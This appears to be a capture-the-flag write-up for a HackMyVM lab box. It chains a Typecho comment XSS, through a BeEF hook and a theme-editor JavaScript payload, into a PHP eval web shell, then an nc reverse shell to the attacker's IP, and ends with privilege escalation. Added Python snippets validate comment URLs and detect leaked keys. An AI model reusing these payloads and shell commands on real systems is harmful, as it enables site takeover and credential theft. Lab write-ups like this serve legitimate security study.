┌──(root㉿kali)-[~/Desktop/hmv/thefinals]
└─# nmap -sCV 192.168.56.105 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-16 22:37 EDT
Nmap scan report for 192.168.56.105
Host is up (0.000076s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey:
| 256 42:a7:04:bb:da:b5:8e:71:7a:89:ff:a4:60:cd:4d:29 (ECDSA)
|_ 256 37:32:71:ca:3f:11:41:b4:d7:90:1e:c9:7f:e8:bc:20 (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Unix))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: THE FINALS
|_http-server-header: Apache/2.4.62 (Unix)
MAC Address: 08:00:27:31:DB:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds
┌──(root㉿kali)-[~/Desktop/hmv/thefinals]
└─# dirsearch -u 192.168.56.105 -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/hmv/thefinals/reports/_192.168.56.105/_25-05-16_22-38-41.txt
Target: http://192.168.56.105/
[22:38:41] Starting:
[22:38:41] 301 - 311B - /js -> http://192.168.56.105/js/
[22:38:48] 301 - 313B - /blog -> http://192.168.56.105/blog/
[22:38:48] 200 - 17KB - /blog/
[22:38:48] 200 - 820B - /cgi-bin/printenv
[22:38:48] 200 - 1KB - /cgi-bin/test-cgi
[22:38:50] 301 - 312B - /css -> http://192.168.56.105/css/
[22:38:51] 301 - 314B - /fonts -> http://192.168.56.105/fonts/
[22:38:52] 301 - 315B - /images -> http://192.168.56.105/images/
[22:38:52] 200 - 607B - /images/
[22:38:53] 200 - 695B - /js/
[22:38:59] 301 - 320B - /screenshots -> http://192.168.56.105/screenshots/
Task Completed
Under the /blog path there is a login page.
Tried brute-forcing it; nothing came out.
There is also a comment box here.
Post any comment and you will then see a screenshot under /screenshots. (This should be the author's hint to me that the administrator visits the comment section periodically.)
It turns out the site runs Typecho 1.20.
Search for known vulnerabilities.
Typecho 1.2 - 1.2.1-rc front-end comment stored XSS to RCE: reproduction, analysis and fix - JunBlog
Found an XSS-to-RCE vulnerability.
Hit it directly with BeEF (beef-xss).
http://xxx.xxx.com/"></a><script/src=http://192.168.56.102:3000/hook.js></script><a/href="#
The hook came online successfully, but there is no RCE.
Use the payload from the article's author.
// Define a function that appends an iframe element to the end of the page
function insertIframe() {
  // Get the current page path
  var urlWithoutDomain = window.location.pathname;
  // Check whether the page is the comment management page
  var hasManageComments = urlWithoutDomain.includes("manage-comments.php");
  var tSrc = '';
  if (hasManageComments) {
    // If so, rewrite the path to the theme file editor page
    tSrc = urlWithoutDomain.replace('manage-comments.php', 'theme-editor.php?theme=default&file=404.php');
  } else {
    // Otherwise use the theme file editor page address directly
    tSrc = '/admin/theme-editor.php?theme=default&file=404.php';
  }
  // Define the iframe element's attributes: id, src, width, height and onload event
  var iframeAttributes = "<iframe id='theme_id' src='" + tSrc + "' width='0%' height='0%' onload='writeShell()'></iframe>";
  // Get the page's original content
  var originalContent = document.body.innerHTML;
  // Append the iframe element to the end of the page
  document.body.innerHTML = (originalContent + iframeAttributes);
}
// Define a global variable isSaved, initially false
var isSaved = false;
// Define a function that writes a piece of PHP code into the iframe and saves it
function writeShell() {
  // If isSaved is false
  if (!isSaved) {
    // Get the content area and the "Save file" button elements inside the iframe
    var content = document.getElementById('theme_id').contentWindow.document.getElementById('content');
    var btns = document.getElementById('theme_id').contentWindow.document.getElementsByTagName('button');
    // Get the template file's original content
    var oldData = content.value;
    // Prepend a phpinfo snippet to the original content
    content.value = ('<?php phpinfo();eval($_POST[\'a\']); ?>\n') + oldData;
    // Click the "Save file" button
    btns[1].click();
    // Set isSaved to true to mark the write as done
    isSaved = true;
  }
}
// Call insertIframe to add the iframe and the PHP-writing event to the page
insertIframe();
Host the payload on a web page, then post a comment.
# Content of the comment's website field
http://xxx.xxx.com/"></a><script/src=http://192.168.56.102:81/hook.js></script><a/href="#
You can see the target fetched this JS file.
Visit
http://192.168.56.105/blog/usr/themes/default/404.php
Triggered successfully.
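The comment chain above works because the website field of a comment is reflected into an href attribute without rejecting quote and angle-bracket characters. As an added defender-side example (not from the writeup and not Typecho's own code), this Python validator accepts only a plain http(s) URL, escapes on output, and flags stored rows that look like an injection attempt; the sample rows are constructed.

```python
"""Input validation and output escaping for a comment 'url' field (added example)."""
import re
from urllib.parse import urlsplit

# Characters that can terminate an attribute or tag when reflected into HTML.
BREAKOUT_CHARS = set('<>"\'')


def is_safe_comment_url(value: str) -> bool:
    """Return True only for an empty value or a plain http(s) URL that cannot break out of href."""
    if not value:
        return True  # an empty website field is allowed
    if any(ch in BREAKOUT_CHARS or ch.isspace() for ch in value):
        return False
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    # host must look like a DNS name or IPv4 literal (port is handled by urlsplit)
    return re.fullmatch(r"[A-Za-z0-9.-]+", parts.hostname or "") is not None


def escape_attr(value: str) -> str:
    """Output-side defence: HTML-escape a value before placing it inside an attribute."""
    return (value.replace("&", "&amp;").replace('"', "&quot;")
                 .replace("'", "&#x27;").replace("<", "&lt;").replace(">", "&gt;"))


def scan_comments(comments):
    """Return ids of stored comments whose url field fails validation (hunting existing injections)."""
    return [c["id"] for c in comments if not is_safe_comment_url(c.get("url", ""))]


# Constructed sample rows shaped like a comments table; not real data from the box.
SAMPLE_COMMENTS = [
    {"id": 1, "url": "http://thefinals.hmv/blog"},
    {"id": 2, "url": ""},
    {"id": 3, "url": 'http://xxx.xxx.com/"></a><script/src=http://192.168.56.102:81/hook.js></script><a/href="#'},
    {"id": 4, "url": "javascript:alert(1)"},
]

if __name__ == "__main__":
    print("suspicious comment ids:", scan_comments(SAMPLE_COMMENTS))
```

Validation alone is not enough on its own: the escape step is what keeps a stored value from closing the anchor tag even if a bad row is already in the database.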
Next, just pop a shell.
Alpine Linux's default shell is ash, so the reverse shell has to use ash here; bash and sh do not work.
a=system('nc 192.168.56.102 1234 -e ash');
Switch to an interactive tty
python3 -c 'import pty; pty.spawn("/bin/sh")'
A hint is found in june's home directory
/home/ju cat message.txt
cat message.txt
Contestants, gear up and get ready! Who's got the KEY? Who's got the the guts?
--- This BROADCAST has been hacked by CNS
The database configuration file is found under the web root
/var/www/html/blog $ cat config.inc.php
cat config.inc.php
<?php
// site root path
define('__TYPECHO_ROOT_DIR__', dirname(__FILE__));
// plugin directory (relative path)
define('__TYPECHO_PLUGIN_DIR__', '/usr/plugins');
// theme directory (relative path)
define('__TYPECHO_THEME_DIR__', '/usr/themes');
// admin directory (relative path)
define('__TYPECHO_ADMIN_DIR__', '/admin/');
// register autoload
require_once __TYPECHO_ROOT_DIR__ . '/var/Typecho/Common.php';
// init
\Typecho\Common::init();
// config db
$db = new \Typecho\Db('Pdo_Mysql', 'typecho_');
$db->addServer(array (
'host' => 'localhost',
'port' => 3306,
'user' => 'typecho_u',
'password' => 'QLTkbviW71CSRZtGWIQdB6s',
'charset' => 'utf8mb4',
'database' => 'typecho_db',
'engine' => 'InnoDB',
), \Typecho\Db::READ | \Typecho\Db::WRITE);
\Typecho\Db::set($db);
Connect to the database; it holds the account and its hash
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
| uid | name | password | mail | url | screenName | created | activated | logged | group | authCode |
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
| 1 | staff | $P$B/qMMS9FETOrEZ38X0YDY5gKJOyiwQ1 | staff@thefinals.hmv | http://thefinals.hmv/blog | staff | 1743647281 | 1747456200 | 1747456140 | administrator | fc3ae2589bbdf2b690828d70bcd6a945 |
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
cmd5 has no match, and this hash is most likely salted too, so forget about brute-forcing it; it almost certainly won't crack.
Then something turned up in the logs
/var/log $ ls
ls
acpid.log chrony messages scotty-main.log
apache2 dmesg scotty-main.err wtmp
/var/log $ cat scotty-main.log |head -n 10
cat scotty-main.log |head -n 10
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
This is obviously a broadcast.
Listen and see.
/ $ nc -ulvnp 1337
nc -ulvnp 1337
listening on [::]:1337 ...
connect to [::ffff:192.168.56.105]:1337 from [::ffff:192.168.56.105]:34032 ([::ffff:192.168.56.105]:34032)
The -u flag is needed here to listen on UDP instead of the default TCP; nothing arrives over TCP. Anyone who has studied TCP/IP knows that broadcasts generally go over UDP, not TCP.
┌──(root㉿kali)-[~/Desktop/hmv/thefinals]
└─# echo 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 |base64 -d
-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----
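The broadcast above leaked a base64-encoded OpenSSH private key to every host on the segment. As an added monitoring example (not part of the writeup or of the box), this Python function classifies a received datagram so a network monitor can alert on key material, whether sent raw or base64-wrapped; the sample datagrams are constructed and contain no real key.

```python
"""Classify UDP datagrams for leaked private-key material (added example)."""
import base64
import binascii
import re
import socket
from typing import Optional

KEY_MARKERS = (
    b"-----BEGIN OPENSSH PRIVATE KEY-----",
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
    b"-----BEGIN PRIVATE KEY-----",
)


def _maybe_base64_decode(data: bytes) -> Optional[bytes]:
    """Decode data if it is made only of base64 characters, else return None."""
    text = data.strip()
    if not text or not re.fullmatch(rb"[A-Za-z0-9+/=\r\n]+", text):
        return None
    try:
        return base64.b64decode(text)
    except (binascii.Error, ValueError):
        return None


def classify_datagram(data: bytes) -> str:
    """Return 'private-key', 'base64-private-key' or 'other' for one datagram."""
    if any(marker in data for marker in KEY_MARKERS):
        return "private-key"
    decoded = _maybe_base64_decode(data)
    if decoded is not None and any(marker in decoded for marker in KEY_MARKERS):
        return "base64-private-key"
    return "other"


def monitor(port: int = 1337, max_datagrams: int = 1):
    """Bind UDP on all interfaces (matches nc -ulvnp) and yield (sender, label) pairs."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.bind(("", port))
        for _ in range(max_datagrams):
            data, sender = sock.recvfrom(65535)
            yield sender, classify_datagram(data)


# Constructed samples: the PEM body below is filler text, not key data.
FAKE_KEY = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
            b"Y29uc3RydWN0ZWQtbm90LWEtcmVhbC1rZXk=\n"
            b"-----END OPENSSH PRIVATE KEY-----\n")
SAMPLES = {"plain": FAKE_KEY, "b64": base64.b64encode(FAKE_KEY),
           "noise": b"Broadcast to eth0 192.168.11.255:1337"}
```

Running `monitor()` on a host of the segment would have flagged the box's broadcast as base64-private-key; the same check applied to the scotty-main.log sender would also show which process should never have had the key in the first place.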
Got a private key; generate the corresponding public key and take a look.
┌──(root㉿kali)-[~/Desktop/hmv/thefinals]
└─# ssh-keygen -y -f id_rsa
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDXCfT3imE6qx9uj6jcIFiI3fEDXrKYpJtfZRjfbH8AT root@thefinals.hmv
It says root directly, so that should be it.
Turns out it's not that simple: it asks for a password.
The user must be wrong; checking the home directories, there is also a scotty user.
┌──(root㉿kali)-[~/Desktop/hmv/thefinals]
└─# ssh -i id_rsa scotty@192.168.56.105
thefinals:~$ id
uid=1002(scotty) gid=100(users) groups=100(users),100(users)
thefinals:~$ whoami
scotty
Check sudo
thefinals:/home/june$ sudo -l
Matching Defaults entries for scotty on thefinals:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for scotty:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"
User scotty may run the following commands on thefinals:
(ALL) NOPASSWD: /sbin/secret
thefinals:/home/june$ sudo -u root /sbin/secret
/sbin/secret: line 2: can't create /dev/pts/99: Permission denied
It tells us it wants /dev/pts/99, so 99 pseudo-terminals need to be open.
thefinals:/home/june$ ls /dev/pts
0 1 2 3 4 ptmx
We currently only have 5,
so use a script to create 94 more
for i in $(seq 1 94); do python -c 'import pty; pty.spawn("/bin/sh")' & done
/home/june $ ls /dev/pts
0 16 23 30 38 45 52 6 67 74 81 89 96
1 17 24 31 39 46 53 60 68 75 82 9 97
10 18 25 32 4 47 54 61 69 76 83 90 98
11 19 26 33 40 48 55 62 7 77 84 91 99
12 2 27 34 41 49 56 63 70 78 85 92 ptmx
13 20 28 35 42 5 57 64 71 79 86 93
14 21 29 36 43 50 58 65 72 8 87 94
15 22 3 37 44 51 59 66 73 80 88 95
/home/june $ tty
/dev/pts/99
Then read the password
/home/june $ sudo -u root /sbin/secret
root:p8RuoQGTtlKLAjuF1Tpy5wX
/home/june $
Tried it: it is not the system root user's password but the database root user's password.
MariaDB [secret]> select * from user;
+----+----------+-------------------------+
| id | username | password |
+----+----------+-------------------------+
| 1 | root | BvIpFDyB4kNbkyqJGwMzLcK |
+----+----------+-------------------------+
1 row in set (0.000 sec)
~ # cat note.txt
ssh://root@thefinals.hmv:BvIpFDyB4kNbkyqJGwMzLcK
ssh://staff@thefinals.hmv:qDCsBTj30cQyityMh3Rnyys
ssh://june@thefinals.hmv:aYTmcORsUrmwaKa7C2DBLCh
ssh://scotty@thefinals.hmv:uuUoqAETern4v5tW2iMFs47
mariadb://root@localhost:p8RuoQGTtlKLAjuF1Tpy5wX
mariadb://typecho_u@typecho_db@localhost:QLTkbviW71CSRZtGWIQdB6s
typecho://staff@thefinals.hmv:n3nPbqEOhs6eTcchyqXTXWi
typecho://june@thefinals.hmv:DihPQiQqNO75vv8zNBzLwUm
flag{4b5d61daf3e2e5ba57019f617012ad0919c2a6c29e11912aeadef2820be8f298}
canyoureachthefinals -> sha256
flag{8c5daa407626d218e962041dd8fd8f37913e56e32a6f06725da403175be0b9ff}
youfinallyreachedthefinals -> sha256
THE FINALS is a great FPS game. A lot of inspiration comes from games. Try it on http://reachthefinals.com/